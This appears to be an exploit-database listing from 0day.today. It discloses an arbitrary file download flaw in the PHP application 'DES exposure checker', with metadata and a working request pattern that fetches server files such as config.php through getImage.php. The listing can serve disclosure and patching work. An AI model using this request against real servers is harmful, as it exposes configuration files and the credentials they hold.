[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

DES exposure checker - Arbitary File Download Vulnerability

Author
Conslight
Risk
[
Security Risk High
]
0day-ID
0day-ID-23255
Category
web applications
Date add
08-02-2015
Platform
php
This vulnerability allow kind of user can to download a file from the distant server, like PHP files, TXT file, etc.

Theory : http://{SERVER}/getImage.php?name={FILE.EXT}

Example : http://victim.com/getImage.php?name=config.php

#  0day.today [2024-11-15]  #